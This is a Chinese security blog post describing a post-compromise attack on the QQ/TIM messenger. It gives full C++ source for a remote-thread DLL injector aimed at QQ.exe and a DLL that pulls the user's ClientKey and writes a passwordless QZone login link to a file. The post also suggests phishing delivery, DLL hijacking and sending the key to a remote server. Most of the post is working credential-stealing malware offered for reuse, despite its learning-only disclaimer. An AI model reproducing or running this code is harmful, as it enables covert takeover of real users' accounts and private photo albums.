声明：Tide安全团队原创文章，转载请声明出处！文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担

一、前言

本文主要讲解如何窃取已登录QQ或TIM用户的ClientKey（前提是当前电脑的QQ或TIM是登录状态），并悄无声息的获取其QQ或TIM的空间登录权限的链接，然后可以在任意一台电脑上都可以无密码登录其QQ空间，也可以查看其加密相册等。具体的实现流程后期可以优化的更完美，因为时间原因只测试了基本功能的实现。只是提供一种思路，大家可以发散思维，把流程更加简化或自动化。

二、技术流程图

三、具体操作

CS和MSF怎样生成上线木马我就不啰嗦了，大家可自行百度无论生成什么格式的木马只要能使被攻击者上线就可以。

参考文章：https://www.cnblogs.com/dgjnszf/p/10877999.html（PS：如果你想让不和你同一网段的人运行木马上线，你的CS应部署到公网上）然后具体的文件钓鱼过程我也不细说了，因为大家都有自己的钓鱼方式。

下面直接就从木马上线传入文件后的操作开始演示：我们需要传入的文件是一个exe一个dll，都需要传入C盘根目录且dll的名字必须命名为Dll1.dll(因为懒惰我都写死到源码中了，大家可根据源码自行修改)。

exe的作用主要是进行远程线程注入QQ.exe程序(因为便于测试，我写死的是注入QQ.exe，大家如果想注入TIM的话可自行修改)。

dllInject.exe源码

[php]
// dllInject.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//

#include "pch.h"
#include <iostream>
#include <windows.h>
#include <TlHelp32.h>
#include <string.h>
//这里我先写死为C:\Dll1.dll
#define DLL_PATH L"C:\Dll1.dll"
//根据进程名获取进程ID，这里我先写死为QQ.exe
DWORD GetProcId()
{
BOOL bRet;
PROCESSENTRY32 pe32;
HANDLE hSnap;

hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
pe32.dwSize = sizeof(pe32);
bRet = Process32First(hSnap, &pe32);
while (bRet)
{
if (lstrcmp(pe32.szExeFile,L"QQ.exe")==0)
{
return pe32.th32ProcessID;
}
bRet = Process32Next(hSnap, &pe32);
}
return 0;
}

int main(){
//0正常情况下，我们可以通过遍历进程根据进程名得到进程ID
DWORD dwId = GetProcId();

//1 打开目标进程，得到句柄
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwId);

//2 在目标进程中申请一块空间，能够存放下dll文件的路径
DWORD dwSize = (wcslen(DLL_PATH) + 1) * 2;
LPVOID lpAddress = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);

//3 将dll文件的路径写入到目标进程申请的空间中
SIZE_T sSize = 0;
WriteProcessMemory(hProcess, lpAddress, DLL_PATH, dwSize, &sSize);

//4 在目标进程中，创建远程线程使其能够执行LoadLibrary，参数是我们写入的dll路径
HANDLE hThread = CreateRemoteThread(
hProcess,
NULL,
NULL,
(LPTHREAD_START_ROUTINE)LoadLibraryW,
lpAddress,
NULL,
NULL
);

//5 等待线程结束，我们释放空间
WaitForSingleObject(hThread, -1);
VirtualFreeEx(hProcess, lpAddress, dwSize, NULL);

//6 程序结束
CloseHandle(hThread);
CloseHandle(hProcess);
}
[/php]

dll的作用主要是用来窃取ClientKey并存储到txt文件。

Dll1.dll源码

[php]
// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "stdafx.h"
#include <stdio.h>
#include<stdlib.h>
#include<windows.h>
#include <WTypes.h>

//定义CTXStringW为BSTR
typedef BSTR CTXStringW;

CTXStringW AllocTXString(const wchar_t* lpSrc)
{
if (lpSrc == NULL) return NULL;
BYTE* bBuffer = new BYTE[16 + (wcslen(lpSrc) + 1) * 2];
if (bBuffer == NULL) return NULL;
DWORD dwZero = 0;
DWORD dwCount = 3;
DWORD dwLenth = wcslen(lpSrc) + 1;
memmove(bBuffer + 0 * 4, &dwZero, 4);
memmove(bBuffer + 1 * 4, &dwCount, 4);
memmove(bBuffer + 2 * 4, &dwLenth, 4);
memmove(bBuffer + 3 * 4, &dwLenth, 4);
wcscpy((wchar_t*)(bBuffer + 4 * 4), lpSrc);
return CTXStringW(bBuffer + 16);
}

VOID Steal()
{
do {

HMODULE hKernelUtil = GetModuleHandle(L"KernelUtil.dll");
if (hKernelUtil == NULL)
{
OutputDebugStringA("Get KernelUtil Module failed n");
break;
}

PVOID PtrGetSelfUin = GetProcAddress(hKernelUtil, "?GetSelfUin@Contact@Util@@YAKXZ");
if (PtrGetSelfUin == NULL)
{
OutputDebugStringA("Get GetSelfUin Function failed n");
break;
}

DWORD uin = ((int(*)(int))PtrGetSelfUin)(1);
if (uin == NULL)
{
OutputDebugStringA("Invoke GetSelfUin Function failed n");
break;
}

// Print QQ number
char szUin[MAX_PATH] = { 0 };
sprintf(szUin, "%d", uin);

PVOID GetSignature = GetProcAddress(hKernelUtil, "?GetSignature@Misc@Util@@YA?AVCTXStringW@@PBD@Z");
if (GetSignature == NULL)
{
OutputDebugStringA("Get GetSignature Function failed n");
break;
}

WCHAR wsBuffer[MAX_PATH] = { 0 };
CTXStringW ClientKey = AllocTXString(wsBuffer);
PVOID res = ((PVOID(*)(PVOID, const char*))GetSignature)(&ClientKey, "buf32ByteValueAddedSignature");
if (res == NULL)
{
OutputDebugStringA("Invoke GetSignature Function failed n");
break;
}

// 复制下面链接，无需密码，进入QQ空间
char msg[MAX_PATH] = { 0 };
sprintf(msg, "https://ssl.ptlogin2.qq.com/jump?ptlang=2052&clientuin=%s&clientkey=%ws&u1=https://user.qzone.qq.com/%s%/infocenter&source=panelstarn", szUin, ClientKey, szUin);
OutputDebugStringA("注入成功");
//MessageBox(NULL, L"提示", L"注入成功", MB_OK);
FILE *file = NULL; //定义一个文件类型(FILE)的指针并初始化;
const char *FileName = "C:\clientkey.txt";
file = fopen(FileName, "w+"); //调用fopen函数，将返回值赋于指针file;

//if (!file) //检查文件是否打开，若打开失败，返回一条信息后，结束程序。
//{
// OutputDebugStringA("文件打开失败,请检查文件是否存在!n");
// exit(1);
//}

//需要写入的字符串内容。
if (!fputs(msg, file)) //调用fputs函数写入文件，不管成功或失败都会返回一条信息。
OutputDebugStringA("文件写入成功n");

fclose(file); //关闭文件。
file = NULL; //放空file指针
} while (0);

}

BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
Steal();
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
[/php]

传入文件之后我们使用命令行运行C盘根目录中的dllInject.exe即可实现自动注入QQ.exe程序并将窃取到的ClientKey存储到C盘根目录，名称为clientkey.txt

dbgView显示注入成功，文件写入成功。然后我们查看生成的clientkey.txt文件中的内容

复制出来在任意电脑访问即可无密码登录其QQ空间查看其加密相册的功能。

四、小结

获取的ClientKey不会因为他QQ的下线而失效，但是会有失效时间，具体是多长时间没有进行测试，大概是一天？虽然这个方法的实战作用并不大但是大家可以参考思路改进或优化方法，比如我们可以使用dll劫持直接劫持QQ程序需要加载的DLL，用户一执行QQ就会自动加载窃取clientkey的dll，这样就免去了使用我编写的exe进行远程线程注入这一步。又或者说是改进dll，把写入txt文件改为直接把获取到的clientkey直接发送到远程服务器上，这样就省去了读取txt文档的步骤，小弟只是提供一下基本思路，有写的不对的地方还请大佬们斧正。

五、参考资料

看雪：https://bbs.pediy.com/thread-256993.htm